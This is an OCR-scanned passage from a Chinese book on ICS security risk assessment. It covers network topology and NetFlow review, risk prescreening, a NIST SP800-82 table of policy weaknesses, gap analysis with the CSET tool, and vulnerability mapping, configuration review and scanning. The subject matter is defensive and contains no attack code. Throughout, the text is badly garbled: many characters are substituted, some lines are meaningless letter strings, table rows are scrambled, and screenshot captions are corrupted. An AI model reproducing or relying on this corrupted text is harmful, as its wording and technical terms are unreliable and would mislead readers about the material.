GRASSMARLIN 目 前 可 以 在 Windows 操 作 系 统 ( 仅 限 Windows7 及 以 上 的 64 位 版 本 ) 和 某 些 版 本 的 Linux 操 作 系 统 (Fedora, Ubuntu) 中 运行 。 该 工具 可 
以 从 https://github.com/iadgov/GRASSMARLIN/releases/latest 下 载 。 
步骤 4: 网 络 拓扑 与 数据 流 审查 


天 联 风险 属性 : ”目标 对 象 、 攻 击 向 量 

网 络 拓 扑 图 不 仪 对 于 正确 识别 资产 非常 重要 ， 对 于 识别 通信 路 径 和 数据 流 也 同样 非常 重要 ， 进 而 有 助 于 攻击 向 量 的 识别 。 数 据 流 分 析 还 有 助 于 友 现 网 络 中 已 
经 存在 的 问题 ， 例 如 信息 泄露 与 恶意 代码 感染 。 

如 果 没有 准确 的 最 新 网 络 架构 图 (这 种 情况 很 常见 ) ， 那 么 束 应 该 首先 把 它 男 出 来 。 前 文 已 经 提 到 过 ， 对 照 准确 的 最 新 资产 清单 列表 逐 项 制作 出 网 络 拓扑 图 
并 加 以 验证 是 非常 重要 的 一 件 事 。 这 一 过 程 很 可 能 既 需 要 |T 人 员 的 参与 ， 也 需要 资产 所 有 者 的 参与 。 


有 几 种 工具 能 够 采用 自动 化 地 方式 绘制 出 网 络 织 构 图 ， 但 是 在 工控 系统 环境 中 采用 自动 化 方式 进行 绘制 有 几 个 缺点 。 首 移 ， 用 于 网 络 上 友 现 的 传统 方法 通 冲 会 
主动 地 将 网 络 流量 引入 到 正在 评估 的 网 络 上 。 但 是 在 工控 系统 网 络 中 非常 不 敦 励 这 种 做 法 。 其 次 ， 这 些 工 具 大 多 需要 长 期 部 署 并 应 用 。 因 此 ， 其 安装 和 配置 过 程 
可 能 耗 时 较 长 而 且 复 杂 度 也 比较 高 。 除 非 这 些 工 具 已 经 部 署 并 配置 好 了 ， 或 者 计划 长 期 使 用 这 些 工 具 ， 人 否则 仪 仪 只 是 将 其 用 于 风险 评 佑 过程 的 这 一 个 步骤 很 可 能 
并 不 值得 为 之 付出 大 量 的 时 间 与 精力 ， 更 何况 还 要 考虑 到 对 工控 系统 网 络 帝 来 的 潜在 负面 影响 。 不 过 ， 伴 随 痢 前 面 讨论 过 的 资产 上 友 现 工具 的 大 量 涌现 ， 网 络 架构 
图 的 绘制 又 有 了 一 个 新 的 选择 。 我 们 之 前 提 到 的 许多 商业 应 用 程序 都 不 同 程度 地 包含 了 帮助 用 户 构建 网 络 拓扑 图 的 功能 。 


强烈 建议 使 用 数据 流 (又 被 称 作 NetFlow) 分 析 工 具 。 只 是 通过 对 网 络 架构 图 和 设备 配置 的 审查 来 识别 NetFlow 是 一 个 静态 并 且 耗 时 的 过 程 ， 结 果 也 并 不 一 

定 准 确 ， 而 且 也 不 能 像 实 时 动态 分 析 一 样 识别 出 潜在 的 恶意 行为 。 如 果 在 网 络 中 部 署 了 诸如 SolarWinds 或 Spiceworks 之 类 的 网 络 管理 工具 ， 那 么 很 可 能 已 经 在 某 
种 程度 上 开始 NetFlow 分 析 了 。 除 了 “企业 级 ”网 络 管 理工 具 之 外 ， 下 面 还 列 出 了 在 进行 NetFlow 分 析 时 用 到 的 其 他 一 些 常用 工具 (还 有 一 些 已 经 提 到 的 资产 管 
理工 具 也 能 实现 该 分 析 功 能 

* Wireshark (https://www.wireshark.org/) 

- Cisco NetFlow (http://www.cisco.com/c/en/us/products/ios-nx-os-software/flexible-netflow/index.html) 

* Plixer Scrutinizer (https://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html ) 

* Netresec NetworkMiner (http://www.netresec.com/? page=NetworkMiner) 

- NetMiner (http://www.netminer.com) 

TU IR RIE AARNA A (IDS) 包括 : 

- Te Bro Network Security Monitor (https://www.bro.org/) 


* Snort (https://www.snott.org/) 


步骤 5: KEII 
天 联 风险 属性 GR, YA 


对 每 项 单一 资产 或 者 系统 都 开展 全 面 的 风险 评估 是 没有 必要 的 。 仪 仪 评 估 预 先 选 定 的 一 部 分 资产 或 者 系统 能 够 为 整个 风险 评估 项 目 节省 大 量 的 时 间 与 成 本 。 
风险 预 筛 正 是 有 助 于 实现 这 一 目的 的 步骤 。 根 据 先前 确定 的 “系统 关键 性 ”评级 可 以 对 每 项 资产 和 (或 ) 系统 进行 优先 级 排序 和 评估 。 评 级 方式 采用 高 、 中 、 低 
式 的 定性 评级 。 低 评级 资产 可 以 在 整个 风险 评估 中 推迟 评估 或 者 取消 评估 ， 而 中 评级 和 高 评级 资产 则 需要 继续 进行 评估 。 可 以 在 NIST SP800-53 建 议 及 FIPS199 标 
准 中 找到 相关 问题 的 示例 和 模板 。 如 前 文 所 述 ， 由 美国 国土 安全 部 开 友 的 网 络 安全 评估 工具 (Cyber Security Evaluation Tool, CSET) 

(https://cset.inl.gov/SitePages/Home.aspx) 能 够 帮助 简化 该 过 程 并 提高 该 过 程 的 自动 化 程度 。 而 且 ， 在 “对 一 次 成 功 的 工控 系统 事件 所 导致 的 潜在 后 果 这 一 
概念 加 以 界定 ”时 ，CSET 工 具 也 能 够 发 挥 作用 。 


2.2.2 ”第 2 阶段 : 脆弱 性 识别 与 威胁 建 模 


脆弱 性 识别 ， 也 称 为 网 络 脆 弱 性 评估 (Cyber Vulnerability Assessment, CVA) 或 者 安全 脆弱 性 评估 (Security Vulnerability Assessment, SVA) ， 是 工 
控 系 统 风险 评估 过 程 中 在 理解 上 存在 大 量 混淆 并 常常 被 误解 的 一 个 领域 。 这 在 很 大 程度 上 是 因为 在 如 何 进行 工控 系统 脆弱 性 识别 的 方面 缺乏 指导 和 通用 (公认 ) 
的 方法 。 当 然 ， 相 关 术 语 的 模糊 和 不 确定 性 也 不 仅 局 限于 工控 系统 领域 。 即 便 在 更 为 成 熟 的 上 T 安 全 社区 也 在 继续 着 类 似 的 争论。 甚至 过 去 有 时 还 会 出 现在 术语 和 
方法 论 方面 存在 冲突 的 不 同 标准 。 举 例 来 说 ， 有 些 标准 将 渗透 测试 介绍 为 一 种 对 脆弱 性 进行 全 面 评 估 的 手段 ， 而 另 一 些 标准 则 将 其 描述 为 适合 于 验证 漏洞 可 利用 
性 ,或 者 清除 传统 漏洞 扫描 器 所 无 法 识别 的 漏洞 (如 0-day 漏 洞 ) 的 “目标 导向 性 ”更 强 的 测试 。 还 存在 一 些 方法 将 脆弱 性 扫描 作为 渗透 测试 的 一 部 分 ， 在 这 种 情 
况 下 ， 渗 透 测试 也 可 以 作为 对 脆弱 性 进行 全 面 识别 的 一 种 手段 。 关 键 在 于 ， 由 于 并 没有 制订 一 项 普遍 接受 的 标准 ， 上 述 争 论 也 就 没有 标准 答案 。 而 最 重要 的 问题 
是 ， 无论 使 用 了 哪个 术语 ， 实 际 采 用 了 哪些 方法 ， 参 与 项 目的 每 名 人 员 都 需要 对 术语 、 采 用 的 方法 和 工作 汽 围 达成 共识 。 


在 工控 系统 风险 评估 过 程 中 的 这 一 阶段 ， 需 要 识别 出 漏洞 以 及 可 能 利用 这 些 漏洞 的 潜在 威胁 源 ， 然 后 再 确定 威胁 源 可 能 使 用 的 潜在 攻击 方法 与 漏洞 利用 方 
法 。 这 一 关联 过 程 也 需要 在 威胁 建 模 期 间 进 行 ， 并 且 最 终 构成 “可 行 的 风险 场景 ”。 为 了 有 效 、 全 面 地 识别 漏洞 ， 除 了 了 解 方法 自身 ， 了 解 每 种 方法 的 类 型 也 很 
重要 。 


本 章 的 剩余 部 分 主要 天 注 于 本 阶段 的 步骤 6 至 步骤 8。 步 又 9 至 步骤 11 则 开始 深入 到 威胁 建 模 的 核心 ， 相 天 内 容 会 在 第 3 章 中 加 以 讨论 。 现 在 ， 让 我 们 先 来 了 解 


一 下 脆弱 性 识别 的 各 个 步骤 (步骤 6 至 步骤 8) 。 


关联 风险 属性 ”脆弱 性 ， 威 胁 向 量 


AERAR RENS RIC BR PAWS RE. MBS RIS RULE ASB (baseline) 。 大 多 数 情 况 下 ， 本 地 策略 主要 基于 常见 的 网 络 安 
全 标准 来 制订 。 因 此 ， 重 要 的 是 要 了 解 机构 应 该 遵循 众多 标准 中 的 哪 一 个 。 无 论 是 安全 策略 不 符合 制订 策略 时 所 基于 的 标准 ， 还 是 没有 遵循 机 构 自 己 制 订 的 策略 
导致 出 现 内 部 不 合 规 的 情况 ， 通 常安 全 策略 都 会 存在 注 弱 环节 。 所 以 ， 应 该 对 作为 机 构 安 全 状况 的 根基 的 安全 策略 和 程序 进行 审查 和 验证 ， 如 果 安 全 策略 存在 注 
弱 环 节 ， 那 么 机 构 的 核心 信息 将 会 面临 风险 。 而 如 果 没 有 安全 策略 ， 则 应 该 首先 制订 安全 策略 。NIST SP800-82 指 南 中 针对 策略 和 程序 的 脆弱 性 提出 了 一 个 非常 
具有 参考 价值 的 基线 列表 ， 如 表 2-3 所 示 。 


表 2-3 NIST SP800-82 指 南 中 提出 的 策略 脆弱 性 、 程 序 脆弱 性 及 描述 


eB 性 Wo 
O | 由 于 策略 制订 不 完善 或 者 缺乏 针对 控制 系统 安全 的 具体 策略 ， 通 常会 导致 工控 系 
Ys ZB es pe A Ags x 

工控 系统 安全 策略 制订 不 | 统 存在 脆弱 性 。 每 项 对 抗 措施 都 应 该 在 策略 中 有 迹 可 循 ， 从 而 确保 一 致 性 和 可 问 责 


完善 性 。 安 全 策略 必须 将 在 工控 系统 环境 中 使 用 的 便携 式 设备 与 移动 设备 也 包括 在 内 


将 正规 的 安全 培训 、 认 知 策略 和 计划 形成 文件 ， 能 够 帮助 工作 人 员 及 时 了 解 机 
没有 正规 的 工控 系统 安全 | 构 的 安全 策略 和 程序 ， 以 及 威胁 、 行 业 网 络 安全 标准 和 建议 措施 等 内 容 。 如 果 没 


培训 与 认 知 计划 有 专门 针对 工控 系统 的 策略 与 程序 培训 ， 就 难以 指望 工作 人 员 能 够 保障 工控 系统 
环境 的 安全 
( 续 ) 
脆 弱 性 描述 


工控 系统 设备 实施 指南 缺 | ”应 该 保证 设备 实施 指南 及 时 更 新 并 且 方 便 获 取 。 在 工控 系统 设备 出 现 故障 的 情 


失 或 不 完善 沈 下 ， 实 施 指南 是 安全 程序 中 必 不 可 少 的 组 成 部 分 


安全 有 条 略 实 施 管理 机 制 缺失 负责 实施 安全 策略 的 工作 人 员 应 当 承 担 管理 安全 策略 和 安全 程序 文档 的 责任 


应 当 制 订 程 序 和 进度 表 ， 用 以 确定 安全 计划 及 其 组 成 控制 措施 正确 实施 的 程 
度 ， 以 及 是 否 按 预期 运行 并 且 达 到 了 满足 工控 系统 安全 要 求 的 预期 效果 。 检 查 
(examination) 有 时 也 被 称 为 “审计 ”(audit) “PET” (evaluation) 或 者 “评估 ” 
( assessment)。 策 略 应 当 涉 及 生命 周期 的 各 个 阶段 ， 以 及 目标 、 专 业 技 术 、 方 法 
和 独立 程度 等 内 容 


应 当 制 订 应 急 预案 并 对 其 进行 测试 ， 以 确保 当 软 硬件 出 现 重大 故障 或 者 设施 损 
坏 时 应 急 预 案 可 以 付 诸 实施 。 缺 乏 专门 针对 工控 系统 的 应 急 预案 可 能 导致 停机 时 


工控 系统 安全 控制 措施 有 
效 性 审查 不 完善 


没有 和 针对 工控 系统 的 应 急 


预案 cages ng 
加 延长 并 市 来 生产 损失 

少 TERZ 1 E Z ae > H> ; 各 -y ~ AY E Fei a TER AHE 

缺乏 配置 管理 策略 缺少 工控 系统 配置 变更 管理 的 策略 和 程序 可 能 导致 无 法 对 人 硬件、 固件 和 软件 进 


行 管理 ， 并 存在 多 于 遭受 攻击 的 漏洞 


访问 控制 的 实施 取决 于 策略 对 角色 、 职 责 和 授权 的 正确 建 模 。 策 略 模型 必须 按 
照 机 构 运 转 的 模式 加 以 构建 


认证 策略 中 需要 定义 认证 机 制 (例如 ， 口令、 智能 卡 ) 的 使 用 时 机 、 使 用 强度 
和 维护 方式 。 如 采 没 有 制订 认证 策略 ， 系 统 可 能 就 不 会 实施 适当 的 号 份 认证 控 

缺乏 适当 的 身份 认证 策略 | 制 ， 从 而 导致 对 系统 进行 未 授权 访问 的 可 能 性 提高 。 考 虑 到 工控 系统 及 其 工作 人 
员 处 理 更 复杂 口令 和 其 他 认证 机 制 的 能 力 ， 认 证 策略 应 该 作为 整体 工控 系统 安全 
项 目的 一 部 分 加 以 制订 


事件 检测 与 啊 应 计划 、 程 序 和 方法 对 于 快速 检测 安全 事件 、 最 大 限度 地 减少 损 
事件 检测 与 啊 应 计划 以 及 | 失 和 和 破坏、 保留 证 据 以 供 后 续 取 证 、 绥 解 漏 洞 利用 所 造成 的 损失 以 及 恢复 工控 系 


缺乏 适当 的 访问 控制 策略 


程 厅 不 完善 统 服务 都 是 十 分 必要 的 。 构 建 语 有 成 效 的 事件 啊 应 能 力 需要 完成 : 对 异常 事件 的 
持续 监控 ， 事 件 处 理 的 优先 级 排序 ， 以 及 实现 数据 收集 、 分 析 和 报告 的 有 效 方 法 
关键 部 件 缺乏 元 余 关键 部 件 缺乏 元 余 可 能 导致 单 点 故障 


步骤 7: 控制 分 析 (标准 审计 ， 差 距 分 析 ) 


关联 风险 属性 ”脆弱 性 


控制 分 析 步 又 也 被 大 多 数 人 看 作 是 针对 某 一 标准 (或 者 一 组 标准 ) 或 策略 所 开展 的 传统 “ 闫 距 分 析 ” 或 “审计 ”工作 ， 并 且 这 一 步骤 也 是 大 多 数 “ 传 统 ” 风 


险 评估 的 中 心 工作 (如 果 不 是 风险 评估 全 部 内 容 的 话 ) . AFRAID RATAR eKARA, FMEA, BN LH SUWEMZRET PLS 
制 措施 提供 据 导 ， 因 此 被 看 作 是 风险 评估 的 根本 核心 内 容 。 这 些 标准 与 要 求 通常 用 作风 险 评估 过 程 中 及 用 的 初始 框架 和 检查 清单 ， 并 且 已 经 出 现 了 几 个 框架 工具 
用 于 进行 问题 追 吵 、 结 果 计 算 和 实现 报告 过 程 的 自动 化 。 


工控 系统 环境 下 最 常用 到 的 风险 评估 工具 之 一 是 由 美国 国土 安全 部 工业 控制 系统 网 络 应 急 响 应 小 组 (ICS-CERT) 所 开发 的 工具 CSET。CSET 将 安全 控制 措施 
与 实践 同行 业 认可 的 一 项 或 多 项 标准 中 已 经 确定 的 要 求 进行 比较 ， 采 用 前 后 一 致 的 方式 逐条 对 安全 控制 和 实践 进行 评估 。 一 旦 评估 问题 回答 结束 ，CSET 将 以 所 选 
择 的 标准 作为 基线 生成 一 份 报告 ， 并 在 报告 中 提出 优先 级 较 高 同时 也 具有 可 操作 性 的 建议 ， 用 来 帮助 提高 被 评估 系统 的 安全 性 。 美 国 国 土 安全 部 ICS-CERT 小 组 表 
示 ， 人 在 CSET 未 来 发布 的 版 本 中 还 将 支持 用 户 输 入 自己 的 问题 集合 ， 从 而 使 得 用 尸 能 够 依据 自 定 义 的 安全 策略 来 评估 系统 ， 尽 管 自 定 义 的 安全 策略 可 能 并 不 严格 遵 
循 工具 中 包括 的 标准 与 最 佳 实践 。 图 2-3 至 图 2-10 对 CSET 的 部 分 特性 和 一 般 过 程 进行 了 介绍 。 


w 注意 


在 CSET 的 最 新 版 本 也 就 是 版 本 7 中 (撰写 本 文 时 的 最 新 版 本 ) ， 已 经 包含 了 同 NIST 提 出 的 网 络 安全 框架 (Cyber Security Framework, CSF) 相关 的 问题 集合 。 
这 一 改进 非常 重要 ， 为 许多 部 署 有 工控 系统 环境 的 公司 都 开始 使 用 CSE 作 为 其 工控 系统 安全 项 目的 基线 。 


一 旦 用 户 建立 了 自己 的 安全 保障 级 别 (SAL) ， 束 可 以 从 多 项 行业 网 络 安全 标准 中 选择 适合 自己 的 标准 ， 如 图 2-3 所 示 。 (用 户 可 以 为 整个 环境 或 者 每 套 系统 
均 制 订 一 个 安全 保障 级 别 ， 具体 取决 于 用 户 对 评估 内 容 如 何 进行 组 织 。) 


LU Requirements 


Select a standard from the thems below 


E Dustors ‘ x 
Oa Chemical, Of, and Natural Gas: Nuclear: 
+j Heguremerë i < 
OB) Requirements [C] CFATS Risk-Based Performance Standards Guide 3-Cyber [C] MEI 08-09 Cyber Security Plan for Nuclear Power Reactors 
Cyberecurity 
D framework 0 NGAA Contra Systems Cyber Security Guidelines for the Natural Gas [ NAC Regulatory Guide $71 
Pipeline Industry | | 


Ths purpeie ed thh document EPE Eda cn 
rng She conn Sys cyber SRO HY plas section of 
L Tä Pipeline Sacurily Celines April 2011 = Git ii o Prenk PFA TEA CER ai z ied on £510.01 
Fleectrivcal: Ol fective Re RUN Sere Sf Raber al dak Es plied if 
Tata ging thii oan pesama Cyber security megum ON SOF 
[ MERC CIP-O02 through O1P-009 Rew 3 
[C] ENssl No. 1253 Baseline 
C] NERC CIF-002 through OP-009 Rew 4 
LJ ONSS! No. 1253 Baseline V2 March 27, 2014 
L] MERC CIP-002 through OIP-011 Rew 5 
[|] CNSS No. 1253 industrial Control System (iC) Overlay 
O MISTIR 7628 Guidelines for Smart Grid Cyber Security: Vol. 1 = 
[L] CONSSI No. 1253 CS) Overlay Version 1 
[_] NISTIR 7628 Guidelines for Smart Grid Cyber Security: Vol 1 Rev 1 


information Technology: 


General: 


C] Cybersecurity Capability Maturity Model (CZM2) 
| | MIST Special Publication 800-53 Rev 3 
[C] Consensus Audit Guidelines (CAG) 

| | NIST Social Publication BO0-53 Re 4 

L] Catalog of Recommendations Rev 7 
Questhons Onby: 

LJ 

O 


[C] NIST Special Publication 800-53 Rev 4 App | 
Process Control and SCADA: 

[C] NIST Special Publication 800-53 Rev 3 App | 

L] NIST Special Publication 800-82 

[C] NIST Special Publication 300-82 Rev 1 


C] NIST Social Publication 800-32 Rev 2 


q Information 
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然后 ，CSET 将 根据 用 户 所 选择 的 标准 生成 一 份 调查 问卷 ， 如 图 2-4 所 示 。 这 些 问 题 可 以 直接 在 工具 中 回答 ， 也 可 以 将 其 导出 交 给 多 名 工作 人 员 进 行 回答 。 用 
户 还 可 以 对 回答 内 容 进 行 注释 ， 并 提供 作为 证 据 使 用 的 文件 (files) 与 文档 (documents) 。 


CSET 还 提供 了 一 个 网 络 拓扑 图 绘制 工具 ( 见 图 2-5) ， 借 助 该 工具 用 户 可 以 采用 可 视 化 的 方式 表示 网 络 拓扑 ， 并 且 可 以 根据 网 络 染 构 对 调查 问卷 进行 调整 。 
该 工具 还 支持 导入 Visio 格 式 的 图 表 ， 但 是 成 功率 以 及 准确 性 可 能 同 原 图 有 所 偏差 。 需 要 指出 的 是 即使 用 户 使 用 CSET 绘 制 得 到 了 网 络 拓扑 图 ， 仍 需 对 该 图 进行 “ 调 
整 ”。CSET 还 将 对 用 户 同 所 选择 的 标准 之 间 的 合 规 进度 进行 记录 ， 如 图 2-6 所 示 。 
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图 2-4 CSETv7 中 的 需求 调查 问卷 
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图 2-5 CSETVv7 中 的 网 络 拓扑 图 绘制 工具 


当前 CSET 还 支持 导入 GRASSMARLIN 数 据 (前 面 已 讨论 过 ) 。 图 2-7 和 图 2-8 进 一 步 说 明了 选取 CSF 作 为 基线 标准 的 控制 分 析 过 程 。 


STANDARDS COMPLIANCE 


SP800-82 V2 


Access Control for Mobile Devices PIEZ 


Contingency Planning Policy and Procedures | 
Critical Infrastructure Plan | 

Denial of Service Protection \ 
Developer-Provided Training 

Emergency Power 

External Information System Services 

Flaw Remediation 


Information Output Handling and Retention 
Information Security Resources 

Information System Connections 

Information System Recovery and Reconstitution 


Maintenance Tools 
Media Protection Policy and Procedures 
Media Use 

Monitoring Physical Access) fig 
Penetration b= 
Personnel Security Policy and Procedures| Hi 
Physical Access Control | 
Port and W/O Device Access 

Process Isolation [ks 

Publicly Accessible Content =. ——_————— SSS 


Risk Assessment Policy and Procedures | 
secure Name /Address Resolution Service (Authoritative Source) | 


ee Assessments 


"Spam Protection | 


图 2-6 ”CSETv7 合 规 进 度 
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F operational risk decisions. 


Asset vulnerabilities are identified and documented 

Threat and vulnerability information is received from information sharing forums and sources 
Threats, both internal and extemal, are identified and documented 

Potential business impacts and likelihoods are identified 


Threats, vulnerabilities, likelihoods, and impacts are used to determine risk 


6 | Risk responses are identified and prioritized 


图 2-7 CSETv7 中 以 CSF 为 基线 的 评估 指导 


CSET 采 用 “仪表 盘 ” 风 格 的 显示 界面 来 展现 即时 分 析 结 果 和 持续 分 析 结 果 ， 如 图 2-9 所 示 。 最 后 ，CSET 还 可 以 通过 报表 生成 器 自动 生成 报表 ， 如 图 2-10 所 
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注意 与 某 一 行业 标准 “ 合 规 ” 并 不 一 定 等 同 于 安全 。 正 如 在 前 文 所 指出 的 ， 仪 仪 采 用 基于 标准 的 审计 或 差距 分 析 进 行 评估 所 处 的 层面 有 些 过 高 、 理 论 性 过 
强 。 
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图 2-8 ”CSETv7 中 以 CSF 为 基线 的 调查 问卷 
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图 2-9 ”CSETv7 仪 表盘 或 计 分 卡 
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图 Create Report(s) 


Select the report(s) and the file types(s) you want to generate. Then click the ‘Create Report(s)' button to create reports for your 
assessment. Clicking the ‘Cog’ icon allows you to select the sections of the assessment that will be included in your detail report. 


图 2-10 ”CSETv7 报 告 生成 器 


理论 上 的 脆弱 性 评估 


理论 上 的 脆弱 性 评估 主要 是 基于 某 种 标准 化 方法 完成 调查 问卷 ， 通 常 依据 给 定 的 安全 基线 (大 多 是 行业 认可 的 安全 标准 ) 以 “面试 ”的 形式 完成 。 基 于 标准 
的 审计 和 差距 分 析 非 常 适合 这 种 类 型 的 脆弱 性 评估 ， 但 实际 上 这 更 多 的 是 安全 控制 评估 而 非 脆 弱 性 评估 。 差 距 ， 或 者 说 是 必需 的 安全 控制 措施 的 缺失 ， 可 能 构成 
潜在 的 脆弱 性 ， 但 这 只 是 在 大 多 数 情况 下 特定 类 型 的 脆弱 性 。 例 如 ， 标 准 所 要 求 的 许多 安全 控制 措施 主要 针对 配置 、 体 系 结构 和 程序 等 内 容 。 标 准 通常 主要 应 付 
系统 加 固 和 (或 ) 系统 修复 问题 ， 而 这 仅仅 是 从 理论 上 解决 软件 和 应 用 程序 的 漏洞 问题 ， 比 如 缓冲 区 溢出 及 其 他 基于 内 存 的 漏洞 。 但 是 ， 选 中 “是 否 部 署 了 补丁 
管理 程序 ? ”的 复 选 框 并 不 能 保证 系统 在 现实 中 已 经 打 好 了 补丁 。 即 便 在 “已经 开展 了 脆弱 性 评估 ”的 复 选 框 中 打 了 勾 ， 在 评估 过 程 中 也 不 会 枚 举 每 个 潜在 的 应 
用 程序 漏洞 。 重 申 一 下 ， 在 调查 问卷 中 的 相关 复 选 框 打 勾 并 不 一 定 意味 着 已 经 开展 了 脆弱 性 评估 ， 也 不 意味 着 已 经 对 系统 进行 了 修复 或 者 采用 了 什么 缓解 措施 。 


很 容易 看 出 ， 仅 仅 依靠 这 种 方式 的 “风险 评估 ”可 能 仍 会 存在 同 标准 之 间 的 差距 。 更 不 用 说 只 采用 这 种 方法 进行 风险 评估 几乎 完全 没有 涉及 对 脆弱 性 的 度量 
和 评级 ， 并 且 也 没有 对 脆弱 性 利用 的 可 能 性 进行 说 明 。 尽 管理 论 上 的 脆弱 性 评估 方法 可 以 作为 、 也 应 该 作为 整体 风险 评估 过 程 的 一 部 分 ， 但 是 为 了 全 面 地 核查 尽 
可 能 多 的 潜在 脆弱 性 ， 其 他 方法 也 是 需要 的 。 


步骤 8: 网 络 脆弱 性 评估 (Cyber Vulnerability Assessment, CVA) 


天 联 风险 属性 目标 对 象 、 威 胁 向 量 、 威 胁 事件 


在 上 一 步骤 中 ， 通 党 提出 一 组 明确 的 要 求 对 人 员 、 过 程 和 现 有 的 安全 控制 措施 (或 者 安全 控制 缺失 ) 进行 评估 ， 而 本 步骤 则 尝试 发 现 技术 上 的 脆弱 性 ， 例 如 
现实 中 系统 的 配置 错误 以 及 应 用 程序 漏洞 。 许 多 机 构 由 于 对 渗透 测试 和 脆弱 性 评估 这 两 个 术语 的 使 用 范围 存在 误解 ， 经 常 混用 两 个 术语 ， 所 以 常 为 此 感到 迷惑 不 
解 ， 从 而 导致 脆弱 性 识别 过 程 不 完整 。 目前 已 经 出 版 了 几 份 天 于 脆弱 性 评估 方法 的 出 版 物 ， 其 中 许多 出 版 物 已 经 在 本 章 开 头 的 表 2-1 中 列 出 ， 但 这 些 出 版 物 并 未 提 
供 很 多 针对 工控 系统 的 信息 (坦白 地 说 ， 这 也 正 是 撰写 本 书 的 主要 原因 ) 。 因 此 ， 本 章 剩余 部 分 以 及 本 书 剩余 章节 的 大 部 分 内 容 都 将 针对 工控 系统 的 脆弱 性 以 及 
工控 系统 脆弱 性 的 识别 与 评估 方法 展开 讨论 。 


本 步 又 通常 仪 涉及 已 知 的 且 已 经 公开 披露 的 漏洞 。 然 而 ,一 些 读者 可 能 希望 对 未 公开 的 0-day 漏 洞 进行 研究 。 虽 然 对 已 知 漏洞 进行 检测 与 管理 确实 已 经 大 幅 降 
低 了 风险 ， 但 是 0-day 漏 洞 已 被 证 明 能 够 造成 后 果 更 加 严重 的 危害 。0-day 漏 洞 为 更 高 级 的 恶意 代码 和 黑客 所 使 用 ， 并 且 通 党 既 没有 针对 该 漏洞 的 补丁 ， 又 没有 相 
应 漏洞 利用 工具 的 1Ds 特 征 码 、 反 病毒 软件 特征 码 。 而 挖 气 0-day 漏 洞 的 挖掘 方法 (例如 静态 逆向 分 析 、 调 试 、 模 糊 测试 、 代 码 审 计 等 ) 则 需要 掌握 非常 专业 的 技 
能 ， 实 际 上 只 有 少数 网 络 安全 专家 具备 这 种 能 力 。 甚 至 对 于 渗透 测试 人 员 而 言 ， 也 并 非 人 人 都 具备 挖掘 0-day 漏 洞 的 技术 实力 。 本 书 的 第 7 章 将 对 工控 系统 漏洞 的 
研究 与 挖掘 方法 进行 概述 。 
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0-day 漏 洞 的 研究 可 能 会 大 幅度 延长 项 目的 时 间 ， 并 显著 增加 项 目的 成 本 。 另 外 ， 研 究 成 果 通 常 与 研究 过 程 中 所 花费 的 时 间 成 正比 。 
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这 一 步骤 主要 考虑 几 种 漏洞 评估 的 方法 ， 下 面 将 逐一 进行 讨论 。 
(1) 漏洞 映射 
漏洞 映射 融 是 将 应 用 程序 、 操 作 系统 和 固件 版 本 同 漏洞 数据 库 中 所 包含 的 已 知 漏洞 进行 手工 匹配 的 过 程 ， 漏 洞 数据 库 包括 : 
- National Vulnerability Database (https: //nvd.nist.gov/) 
- Common Vulnerabilities and Exposures Database (https: //cve.mitre.org/) 
- ICS-CERT Advisories (https://ics-cert.us-cert.gov/advisories/ICSA-15-300-03) 
- Security Focus (http://www.securityfocus.com/) 
* Exploit Database (https://www.exploit-db.com/) 
上 面 列 出 的 只 是 几 个 最 为 常见 的 漏洞 数据 库 ， 类 似 的 漏洞 库 还 有 很 多 。 
(2) 配置 审查 


配置 审查 就 是 对 设备 (包括 网 络 设备 和 工控 系统 设备 ) 、 系 统 和 主机 配置 进行 审查 的 过 程 ， 以 寻找 可 能 导致 风险 的 、 防 护 水 平 较 弱 的 配置 或 错误 的 配置 。 配 
置 审 查 过 程 既 可 以 通过 手动 方式 实现 ， 也 可 以 借助 自动 化 工具 实现 。 自 动 化 工具 将 主机 的 当前 配置 同一 组 可 以 接受 的 设置 进行 比较 。 这 些 设置 可 以 根据 机 构 的 安 
全 策略 、 监 管 标 准 来 确定 ， 也 可 以 根据 某 些 机 构 发 布 的 业界 认可 的 一 组 基线 标准 来 确定 ， 例 如 NIST、 互 联网 安全 中 心 (Center for Internet Security) 、 美 国 国 
家 安全 局 (National Security Agency) 以 及 商业 安全 公司 。 当 前 有 多 种 配置 审核 工具 可 以 用 于 标准 IT 设备 、 工 作 站 和 个 人 主机 的 审查 ， 包 括 : 


- Nipper Chttps://www.titania.com/) 
- Nessus (http://www.tenable.com/products/nessus-vulnerability-scanner) 


- Nexpose (https://www.tapid7.com/products/nexpose/ ) 


通 弟 来 说 ， 在 控制 系统 网 络 与 设备 中 运行 这 些 工 具 极 为 不 受 。 不 过 ， 美 国 能 源 部 资助 Digital Bond 公 司 开展 了 一 个 项 目 ， 尝 试 为 工控 系统 制订 一 套 安全 配置 
目 南 。 该 项目 为 20 多 个 不 同 的 工控 系统 组 件 开 友 出 了 Nessus 配 置 文件 审计 脚本 。 这 些 审计 脚本 文件 能 够 帮助 资产 所 有 者 、 系 统 集成 商 和 供应 商 们 对 系统 进行 验 
证 ， 以 确定 其 是 否 已 经 根据 一 组 一 致 的 度量 标准 以 最 优 的 安全 方式 进行 了 配置 。 这 些 审计 文件 可 以 从 Digital Bond 公 司 的 网 站 
(http://www.digitalbond.com/tools/bandolier/) 上 免费 获取 。Tenable 公 司 随后 继续 开展 该 项 研究 ， 并 为 其 Nessus 漏 洞 扫描 器 维护 了 一 套 不 断 扩 充 的 
SCADA 揪 件 集 (https://www.tenable.com/plugins/index.php?view=all&family=SCADA) 。 


有 助 于 识别 工控 系统 设备 配置 和 固件 中 漏洞 的 另 一 个 工具 是 Indegy， 该 工具 之 前 称 为 工控 系统 资产 被 动 识 别 工具 。 除 了 被 动 地 识别 工控 系统 资产 之 
外 ，Indegy 还 可 以 将 固件 和 配置 同 已 知 漏洞 进行 比较 ( 见 图 2-11) 。 
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图 2-11 Indegy 工 具 展 示 漏 洞 警 报 的 界面 
(3) 漏洞 扫 摘 


漏洞 扫描 使 用 主动 扫描 工具 ， 采 用 将 特征 匹配 和 配置 审查 或 补丁 审查 相 结 合 的 方法 来 识别 已 知 漏洞 。 考 虑 到 该 方法 的 主动 性 特点 ， 只 能 在 工控 系统 测试 与 开 
发 网 络 中 进行 漏洞 扫描 ， 而 不 能 在 生产 系统 中 运行 。 


Os 


为 了 充分 发 挥 漏洞 扫描 的 作用 ， 强 烈 建 议 部 署 一 套 在 配置 上 同 生 产 环 境 相 同 (或 者 至 少 非常 相似 ) 的 副本 实验 环境 ， 并 针对 副本 实验 环境 进行 扫描 。 这 是 工 
